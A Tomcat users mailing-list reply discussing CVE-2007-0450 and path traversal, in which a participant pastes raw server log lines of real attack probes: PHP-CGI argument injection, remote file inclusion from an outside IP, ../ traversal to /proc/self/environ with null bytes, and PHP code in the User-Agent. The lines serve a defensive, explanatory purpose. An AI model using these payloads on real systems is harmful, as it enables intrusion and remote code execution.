Re: Need help to understand CVE-2007-0450

[André Warnier]

Athanasios Kostopoulos wrote:
On 22/11/12 10:52, Aditi Sinha wrote:
Hi Andre,
Agree with your points.

Just wanted to know more about  “Directory Traversal Attack".
Can it lead to access of directories outside Tomcat/webapps folder also
  or can it just try to access the applications within Tomcat/webapps
folder only?


Thanks & Regards,
Aditi

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Hi everyone,
OWASP maintains some nice resources about path traversal attacks. A nice 
starting point is the following:
https://www.owasp.org/index.php/Path_Traversal


And for anyone that would think that this is not a genuine concern, here are a few recent 
samples from a logfile of one of our servers (among many, many similar ones) :

173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET 
/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron 
HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET 
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron 
HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F178.63.8.214%2Fecho.txt 
HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F178.63.8.214%2Fecho.txt 
HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/?mod=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo 
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo 
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/index.php?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 404 359 "-" "<?php echo 
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo 
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/index.php?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "<?php 
echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET 
/?mod=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo 
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET 
/index.php?mod=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "<?php 
echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET 
/main.php?x=../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "<?php echo 
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"


---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org